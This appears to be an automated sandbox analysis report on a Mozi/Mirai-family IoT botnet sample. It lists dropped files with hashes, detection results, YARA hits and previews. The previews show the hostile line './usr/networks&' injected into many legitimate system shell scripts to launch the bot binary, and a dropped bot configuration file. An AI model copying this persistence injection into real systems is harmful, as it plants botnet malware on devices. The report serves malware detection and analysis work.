                                                                                                                  • Filename: Mozi.a, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: Mozi.m, Detection: malicious
                                                                                                                  • Filename: bad_file, Detection: malicious
                                                                                                                  • Filename: mxjzQQFgLp, Detection: malicious
                                                                                                                  • Filename: JrAL1wW1MQ, Detection: malicious
                                                                                                                  Preview: #!/bin/sh./usr/networks&.
                                                                                                                  /etc/wpa_supplicant/action_wpa.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):714
                                                                                                                  Entropy (8bit):5.329653855555143
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                                  MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                                  SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                                  SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                                  SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                                  /etc/wpa_supplicant/functions.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/wpa_supplicant/ifupdown.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3368
                                                                                                                  Entropy (8bit):5.3288648372922625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                                  MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                                  SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                                  SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                                  SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                                  /tmp/.config
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):284
                                                                                                                  Entropy (8bit):4.841045283359712
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NL:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuV
                                                                                                                  MD5:1AB810C9212BB8053F4F725DF471AED5
                                                                                                                  SHA1:25818035C48AD5FD30FF74125A38F7522C0B1AFA
                                                                                                                  SHA-256:20AC9D8408C78F424C045419BEC511C90ADED7E9DFCEA1D26D704D18D1BA5C6E
                                                                                                                  SHA-512:38F215233DBB733F014B31B9DBB8D40DD15AD61EDFB9F62D052F6ABD75A61A162F3298EDFAD9DC47B4DB330041E514AF5A666711FE12BEA8A2E0B5C1DCABC055
                                                                                                                  Malicious:false
                                                                                                                  Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                                                                  /usr/bin/gettext.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914
                                                                                                                  Entropy (8bit):4.829445473341419
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                                  MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                                  SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                                  SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                                  SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                                  /usr/networks
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):307960
                                                                                                                  Entropy (8bit):5.819679405566689
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                  MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                  SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                  SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                  SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                                  • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Metadefender, Detection: 54%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                  /usr/sbin/alsa-info.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25983
                                                                                                                  Entropy (8bit):5.455683610707543
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                                  MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                                  SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                                  SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                                  SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                                  /usr/share/alsa-base/alsa-info.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25464
                                                                                                                  Entropy (8bit):5.453877096685684
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                                  MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                                  SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                                  SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                                  SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                                  /usr/share/alsa/utils.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4725
                                                                                                                  Entropy (8bit):5.44928341819888
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                                  MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                                  SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                                  SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                                  SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                                  /usr/share/brltty/initramfs/brltty.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):46
                                                                                                                  Entropy (8bit):3.925523369006428
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                  /usr/share/cups/braille/cups-braille.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:UTF-8 Unicode text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3551
                                                                                                                  Entropy (8bit):5.478748088887141
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                                  MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                                  SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                                  SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                                  SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                                  /usr/share/cups/braille/index.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):590
                                                                                                                  Entropy (8bit):5.080350031939274
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                                  MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                                  SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                                  SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                                  SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                                  /usr/share/cups/braille/indexv3.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):945
                                                                                                                  Entropy (8bit):4.9071581716168575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                                  MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                                  SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                                  SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                                  SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/cups/braille/indexv4.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):818
                                                                                                                  Entropy (8bit):4.8178661177968065
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                                  MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                                  SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                                  SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                                  SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/debconf/confmodule.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/acpid/examples/ac.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/acpid/examples/default.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):309
                                                                                                                  Entropy (8bit):4.972882784760757
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3647
                                                                                                                  Entropy (8bit):4.544491450799858
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                                  /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:awk or perl script, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1829
                                                                                                                  Entropy (8bit):4.38604786798686
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                                  /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
